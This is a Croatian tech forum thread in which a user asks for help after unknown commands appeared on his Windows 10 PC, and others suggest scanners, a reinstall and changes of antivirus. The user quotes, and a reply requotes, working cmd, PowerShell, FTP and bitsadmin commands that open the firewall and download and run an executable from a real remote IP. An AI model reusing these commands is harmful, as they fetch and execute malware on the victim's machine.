hrvoje_vk ned 17.3.2019 11:36

Pozdrav svima,

 

sinoć sam ostavio računalo upaljeno i jutros su me dočekala ova dva prozora (u prilogu) iz cmd-a. Koristim Win10 i Nod32 (licencirani). Koliko sam skužio skripta je pokušala preuzeti datoteku aw.exe sa 92.63.197.153 (Nod32 blokira isti IP), preimenovati ga i pokrenuti a usput otvoriti i određeni port. Ima li netko više saznanja o tome? Kako mi se čini, exe nije preuzet ali me brine tko (koji program) je pokrenuo samo preuzimanje?

hrvoje_vk ned 17.3.2019 11:51

Evo ih još, redom:

 

cmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes

cmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get aw.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start aw.exe"

cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/aw.exe','%temp%\53030495950.exe');Start-Process '%temp%\53030495950.exe'

cmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/aw.exe %temp%\4959603030.exe&start %temp%\4959603030.exe

rambox ned 17.3.2019 14:38
hrvoje_vk kaže...

Evo ih još, redom:

 

cmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes

cmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get aw.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start aw.exe"

cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/aw.exe','%temp%\53030495950.exe');Start-Process '%temp%\53030495950.exe'

cmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/aw.exe %temp%\4959603030.exe&start %temp%\4959603030.exe

Skeniraj komp sa HitmanPro, pa ako nađe(oče sigurno) neku gamad iskoristi besplatni Trial ključ za čiščenje gamadi.

 

https://www.hitmanpro.com/en-us/hmp.aspx

 

https://www.virustotal.com/#/url/89493b8504a7a87b7adf1f0899029467c9f99e62021fe1b1be1268d23c5c0e6d/detection

 

Tvoj komp nije čist od gamadi ili ostalog smeča, ipak očekivano s obzirom da Nod ili Eset baš i nije jako efikasan antivirus.Nakon Hitmana preskeniraj i počisti komp sa AdwCleaner.

 

https://www.malwarebytes.com/adwcleaner/

 

 

hrvoje_vk sri 20.3.2019 20:19
rambox kaže...
Skeniraj komp sa HitmanPro, pa ako nađe(oče sigurno) neku gamad iskoristi besplatni Trial ključ za čiščenje gamadi.

 

https://www.hitmanpro.com/en-us/hmp.aspx

 

https://www.virustotal.com/#/url/89493b8504a7a87b7adf1f0899029467c9f99e62021fe1b1be1268d23c5c0e6d/detection

 

Tvoj komp nije čist od gamadi ili ostalog smeča, ipak očekivano s obzirom da Nod ili Eset baš i nije jako efikasan antivirus.Nakon Hitmana preskeniraj i počisti komp sa AdwCleaner.

 

https://www.malwarebytes.com/adwcleaner/

 

 

 

Pozdrav, hvala na savjetima, sve to sam pokušao, no ni hitman ni adwcleaner nisu pronašli apsolutno ništa.

Prije desetak minuta sam doslovnio gledao kako se otvara "run" prozor i kako se naredbe ubacuju u njega. Kada sam isključio WiFi mrežu naredbe su prestale dolaziti. Pretpostavljam da je neki program napravio backdoor ili?

rambox sri 20.3.2019 21:39
hrvoje_vk kaže...

 

 

 

Pozdrav, hvala na savjetima, sve to sam pokušao, no ni hitman ni adwcleaner nisu pronašli apsolutno ništa.

Prije desetak minuta sam doslovnio gledao kako se otvara "run" prozor i kako se naredbe ubacuju u njega. Kada sam isključio WiFi mrežu naredbe su prestale dolaziti. Pretpostavljam da je neki program napravio backdoor ili?

Da nešto slično u tom stilu, pa ako samo korisitš WiFi internet valjda si promjenio lozinku i postavio drugu osjetno jaču lozinku.

 

Na daljinu je teško procjenit, za sad još isprobaj Bitdefender specifičan alat pa vidi kaj on kaže.

 

https://labs.bitdefender.com/2013/02/rootkit-remover-download-page/

 

 

 

 

hrvoje_vk čet 21.3.2019 07:39

Ah, gledaj, reinstall mi je zadnja opcija budući da baš nemam toliko slobodnog vremena i “3 puta” reinstalirati kao što bi ti... Ako je ikako moguće bolje bih se riješio gamadi, za sada antivirus uspješno blokira pokušaje preuzimanje virusa (i to koliko sam vidio ransomware), ali to se može brzo promijeniti.

hrvoje_vk čet 21.3.2019 07:39

Ah, gledaj, reinstall mi je zadnja opcija budući da baš nemam toliko slobodnog vremena i “3 puta” reinstalirati kao što bi ti... Ako je ikako moguće bolje bih se riješio gamadi, za sada antivirus uspješno blokira pokušaje preuzimanje virusa (i to koliko sam vidio ransomware), ali to se može brzo promijeniti.

Shaka111 čet 21.3.2019 08:06
hrvoje_vk kaže...
Ah, gledaj, reinstall mi je zadnja opcija budući da baš nemam toliko slobodnog vremena i “3 puta” reinstalirati kao što bi ti... Ako je ikako moguće bolje bih se riješio gamadi, za sada antivirus uspješno blokira pokušaje preuzimanje virusa (i to koliko sam vidio ransomware), ali to se može brzo promijeniti.

 ček malo, nemaš vremena napravit reinstal ali imaš vremena tražit po forumu odgovor na pitanje na koje će ti 99% korisnika reći isto što i ja. Između ostalog reinstall windowsa napraviš za manje od sat vremena pa ne vidim u čemu je problem.

Mislim, zdrava logika ali radi što hoćeš...

Čitatelj čet 21.3.2019 08:12

Dok sve to isprobas - vec si mogao napraviti backup, instalaciju,

preskenirat backup, stavit sve drivere, vratiti backup i napraviti image

ispravnog OS-a.

 

Taj OS je komprimiran i njegovo koristenje je sve samo ne pametno.

Na takvom OS-u sad zamisli napraviti ista sa internet bankarstvom,

BTB ili nesto trece. No way.

 

Napravi backup i instalaciju. I drugi put manje krscanskih stranica,

tamo je najvise virusa.

djigibao čet 21.3.2019 11:34
hrvoje_vk kaže...
Ah, gledaj, reinstall mi je zadnja opcija budući da baš nemam toliko slobodnog vremena i “3 puta” reinstalirati kao što bi ti... Ako je ikako moguće bolje bih se riješio gamadi, za sada antivirus uspješno blokira pokušaje preuzimanje virusa (i to koliko sam vidio ransomware), ali to se može brzo promijeniti.

 

Skini Farbar Recovery Scan Tool, stavi na desktop i pokreni kao admin.

Kad zavrsi dobit ces 2 LOG fajla (FRST i Additions), da dva fajla uploudaj negdje na net (cloud) i stavi ovdje link da se mog skinuti pa ce netko pregledati te LOG-ove i reci ti sta da radis.

 

...naravno, ako nisi za ponovnu instalaciju Windowsa sto bi ti bilo najpametnije i najsigurnije...

ihush čet 21.3.2019 13:38
Shaka111 kaže...
hrvoje_vk kaže...
Ah, gledaj, reinstall mi je zadnja opcija budući da baš nemam toliko slobodnog vremena i “3 puta” reinstalirati kao što bi ti... Ako je ikako moguće bolje bih se riješio gamadi, za sada antivirus uspješno blokira pokušaje preuzimanje virusa (i to koliko sam vidio ransomware), ali to se može brzo promijeniti.

 ček malo, nemaš vremena napravit reinstal ali imaš vremena tražit po forumu odgovor na pitanje na koje će ti 99% korisnika reći isto što i ja. Između ostalog reinstall windowsa napraviš za manje od sat vremena pa ne vidim u čemu je problem.

Mislim, zdrava logika ali radi što hoćeš...

 -da...

Čitatelj kaže...

Dok sve to isprobas - vec si mogao napraviti backup, instalaciju,

preskenirat backup, stavit sve drivere, vratiti backup i napraviti image

ispravnog OS-a.

 

Taj OS je komprimiran i njegovo koristenje je sve samo ne pametno.

Na takvom OS-u sad zamisli napraviti ista sa internet bankarstvom,

BTB ili nesto trece. No way.

 

Napravi backup i instalaciju. I drugi put manje krscanskih stranica,

tamo je najvise virusa.

 ..da.

 

+ ako je otvarao portove (modem-router).. tj to je jedino moguće, sporedan je tad os jer bi ga modem jednako štitio. No to su stvari koje juzer zna, svjesno napravi.. ali mu ne pada na pamet da je to uzrok-posljedica.. npr za gaming/torrente i sl.

 

tak da ni clean install ne znači ništa, klauzalnost, ako napravi iste stvari imat će isti rezultat.. mora nešto promijeniti u 'formuli', .. za početak, modem. OS je u tome sporedan (osim trojanac koji vjerojatno negdje čući..).

hrvoje_vk čet 21.3.2019 16:53

Nekada, u doba news grupa, rasprave su bile vrlo konstruktivne... Tražila se pomoć iskusnijih i/ili korisnika koji su već imali takav/sličan problem (u bilo kojem području), i najčešće je završavala adekvatnim rješenjem. Naravno, bilo je i tada drk*džija kao i danas koji vise na njima non stop (doduše vrlo skupo preko dial-up veze), prosipaju pamet i po*jebavaju sve redom (a.k.a. flame) :) A tada su se pojavili forumi.

 

Ipak, komentari pojedinaca mi ulijevaju nadu da nije sve izgubljeno (rambox, djigibao, ihush - hvala :) )

 

Da, reinstalirao sam Windowse, što mi je bila zadnja opcija. Ne, nije sat vremena ako želiš sve podesiti za rad u koji ne spadaju samo otvaranje BUG-ovog foruma i igranje igara, eventualno "fejsanja". Reinstalirao sam ih iako bih više volio znati točan uzrok problema, budući da striktno pazim kako se služim računalom (insinuacija Čitatelja o kršćanskim stranicama :D ). Po meni, usporedba je kao kad vam se pokvari motor na automobilu - pa valjda idemo prvo pokušati popraviti taj motor a ne odmah ga mijenjati...

 

Hvala još jednom svima na komentarima i pomoći! :)

 

P.S. no hard feelings, BUG-ov forum smatram jednim od rijetkih mjesta na kojemu se može korisno raspravljati.

 

 

ihush čet 21.3.2019 17:40
hrvoje_vk kaže...

..Reinstalirao sam ih iako bih više volio znati točan uzrok problema,..

 

 -uzrok? = sve mogućnosti koje nudi današnji OS-platforma, tj automatika, internet itd.. + cilj (koji je većinom zarada, interes-razlog zašto to druga strana radi, zašto postoje 'virusi'-malware..) .. + naivnost juzera koja otvara vrata malwareu u 99%, dok su oni 'pravi' desetljećima skriveni, nepoznati.. (i dalje su tu, dok ne znamo, ne boli nas..).

 

-zašto npr antivirusi ne pronalaze virus? Recimo, jedan od mogućih odgovora, jer nema virusa. Ako je i bio, već je uklonjen. Iskorišten (trojan) za ulaz, nakon toga je nepotreban. OStalo je stvar mogućnosti platforme, osa, npr ransom-crypt nije virus, nego najnormalnija mogućnost, os, .. i da koristiš kao juzer to bi bilo jednako kao koritšenje nrp zipa ili copy.. uz razliku, tad ti imaš ključ. Ako nešto prođe, tad pokrene npr skriptu (nrp batch file nikad nećemo nazvati virusom, malwareom, mada ono što radi može imati siti učinak.. ili virus je specifičan soft.. kao što su trojanci grupa za sebe itd..). Jednom kad se nešto provuče (nazovimo to virus..), kad obavi početni task, tad recimo crypt sam sebe obriše, tako oteža dekript jer nemaš trag-uzorak, nema alarma i sl. a ono što radi je zapravo legitimna naredba-operacija, kao što možeš zabiti auto u zid, mada je ispravan.. (ne moraju biti pokvarene kočnice/upravljač..).

npr razni mineri  (bitcoin..) i program SETI su u osnovi ista stvar i u pravilu, antivirus nema što detektirati, tj legitimne app koje rade ono što je juzer dozvolio-pokrenuo (auto u zid). Ako je SETI tad ok, ako je miner, tad ovisi jel ti majnaš ili netko treći a ti to ne znaš.. i tad je to čaroliom od legitimne app-skripte postao ''malware'', ali je zapravo isto, av task vidi jednako.. prije da će ga neka blacklista zaustaviti (ne neka antivirus-heuristika i sl.).

 

po onome što si utipkao, vidi se ip, server.. russija, .. to ne može bez modema-routera, tj otvaranja porta na modemu, osim ako konekciju obavi računalo (tad ono otvara kanal i modem propušta..). Provjeri modem postavke. Postavke na OSu su nevažne u tome.

-zašto to ne možeš spriječiti antivirusom? pa zato jer je to npr VPN, mogućnost. To AV nema po čemu blokirati, odnosno, ako želiš siguran pc tad blokiraš sve, ali tad ti ništa ne radi, ili-ili.. ili odspojiš internet. Npr prošli mjesec je objavljen 'fičer' u rar-u, može pokrenuti maliciozni kod.. koji tad može otvoriti port, na win, na routeru, dodati exceptione u rulove.. može sve što može i juzer jer je već u računalu i ne radi ništa 'čudnovatog' nego ono što može os. Pa ako si skinuo neki rarfile i bez skeniranja raspakirao, može biti odgovor 'kako' je ušao.. itd. (dok je danas 90% klikanjem online na nešto što nije trebalo kliknuti ili biti na toj stranici, jer čak je i to dovoljno, .. zbog automatike, ne samo za win, isti problem je npr na macu i jednu od tih rupa su zakrpali prije par dana, no sumnjam da je to jedina-posljednja rupa.. itd.).

rambox čet 21.3.2019 19:56
hrvoje_vk kaže...

Nekada, u doba news grupa, rasprave su bile vrlo konstruktivne... Tražila se pomoć iskusnijih i/ili korisnika koji su već imali takav/sličan problem (u bilo kojem području), i najčešće je završavala adekvatnim rješenjem. Naravno, bilo je i tada drk*džija kao i danas koji vise na njima non stop (doduše vrlo skupo preko dial-up veze), prosipaju pamet i po*jebavaju sve redom (a.k.a. flame) :) A tada su se pojavili forumi.

 

Ipak, komentari pojedinaca mi ulijevaju nadu da nije sve izgubljeno (rambox, djigibao, ihush - hvala :) )

 

Da, reinstalirao sam Windowse, što mi je bila zadnja opcija. Ne, nije sat vremena ako želiš sve podesiti za rad u koji ne spadaju samo otvaranje BUG-ovog foruma i igranje igara, eventualno "fejsanja". Reinstalirao sam ih iako bih više volio znati točan uzrok problema, budući da striktno pazim kako se služim računalom (insinuacija Čitatelja o kršćanskim stranicama :D ). Po meni, usporedba je kao kad vam se pokvari motor na automobilu - pa valjda idemo prvo pokušati popraviti taj motor a ne odmah ga mijenjati...

 

Hvala još jednom svima na komentarima i pomoći! :)

 

P.S. no hard feelings, BUG-ov forum smatram jednim od rijetkih mjesta na kojemu se može korisno raspravljati.

 

 

Ok pala je reinstalacija, ali ubuduče ako baš hočeš platit za zaštitu Windowsa ipak izaberi drugi AV oklop.

 

ESET ima bljakloš Behvioral Blocking modul,dakle kad treba ulovit ili blokirat potencijalne sumnjivce/sumnjivo ponašanje bez antivirusnih definicija.U tvojem primjeru, eto ESET jedino može blokirat IP/poslani exe sa kojeg se nešto šalje ili nudi.Vjerojatno je ranije ESET i iskočio, pa blokira/obrisal dio gamadi koja te zaskočila u ovom primjeru.Ali nesposobni ESET nije odradio posao do kraja, nekaj je vjerojatno obrisal a za sve ostalo u pozadini kod ESET je nit vidim nit čujem.

 

Za ubuduče ako plačaš Sophos Home Premium ili Kaspersky Internet Security, a "ESET fino instaliraj u Recycle Bin".

 

https://www.youtube.com/user/ThePCSecurity/videos

 

Realno i za badave moš imat odličnu zaštitu, pa eto za detalje tu je dolnji link.

 

https://www.bug.hr/forum/topic/komentari-clanaka-bughr/kaspersky-lab-tuzi-apple-zbog-app-storea/267268.aspx?page=0&jumpto=5876887&sort=asc&view=flat